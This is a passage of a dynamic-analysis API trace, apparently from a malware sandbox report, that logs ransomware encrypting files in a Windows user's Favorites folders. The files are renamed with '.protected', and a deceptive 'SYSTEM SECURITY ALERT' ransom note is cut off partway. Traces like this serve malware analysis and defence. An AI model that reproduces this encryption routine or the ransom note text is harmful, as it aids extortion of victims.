returned -1 [0091.693] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites") returned 43 [0091.693] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0091.693] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0091.693] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*") returned 45 [0091.693] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0091.697] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.697] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.697] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.697] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.697] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.697] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.") returned 45 [0091.697] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.697] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.697] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.697] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.697] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.698] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.698] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.698] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.698] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.698] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\..") returned 46 [0091.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.698] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.698] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.698] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.698] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.698] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.698] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.700] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.700] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.700] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.700] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.701] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.701] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.701] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.701] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.702] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.702] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.702] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.702] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.702] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.702] CloseHandle (hObject=0xb4) returned 1 [0091.703] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.protected") returned 65 [0091.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.protected")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0091.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 49 [0091.704] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0091.704] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0091.704] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned 51 [0091.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.705] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.705] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.705] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.705] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.705] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.705] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.") returned 51 [0091.705] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.705] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.705] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.705] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.705] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.705] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.705] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.705] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.705] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.705] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.705] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.705] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\..") returned 52 [0091.705] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.705] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.705] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.705] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.705] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.705] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.706] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.706] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.706] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.706] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.706] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.706] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.707] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.707] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.707] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.707] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0091.708] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.708] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0091.708] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.708] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.708] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.708] CloseHandle (hObject=0xd4) returned 1 [0091.709] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.protected") returned 71 [0091.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.protected")) returned 1 [0091.769] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Windows") returned -1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Program Files") returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Program Files (x86)") returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="$Recycle.bin") returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="System Volume Information") returned -1 [0091.769] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.769] StrStrIW (lpFirst="Suggested Sites.url", lpSrch=".protected") returned 0x0 [0091.769] lstrcmpW (lpString1="Suggested Sites.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.769] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.769] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.770] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".txt") returned 0x0 [0091.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.770] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".rar") returned 0x0 [0091.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.770] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".zip") returned 0x0 [0091.770] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xec, lpOverlapped=0x0) returned 1 [0091.771] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.771] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xec, lpOverlapped=0x0) returned 1 [0091.772] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.772] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.772] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.772] CloseHandle (hObject=0xd4) returned 1 [0091.773] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.protected") returned 79 [0091.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.protected")) returned 1 [0091.774] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Windows") returned -1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files") returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files (x86)") returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="$Recycle.bin") returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="System Volume Information") returned 1 [0091.774] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.774] StrStrIW (lpFirst="Web Slice Gallery.url", lpSrch=".protected") returned 0x0 [0091.774] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.774] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.774] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.776] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".txt") returned 0x0 [0091.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.776] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".rar") returned 0x0 [0091.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.776] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".zip") returned 0x0 [0091.776] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0091.777] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.777] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0091.778] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.778] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.778] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.778] CloseHandle (hObject=0xd4) returned 1 [0091.779] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.protected") returned 81 [0091.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.protected")) returned 1 [0091.780] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.780] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.780] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\RESTORE_FILES.txt") returned 67 [0091.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.780] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our 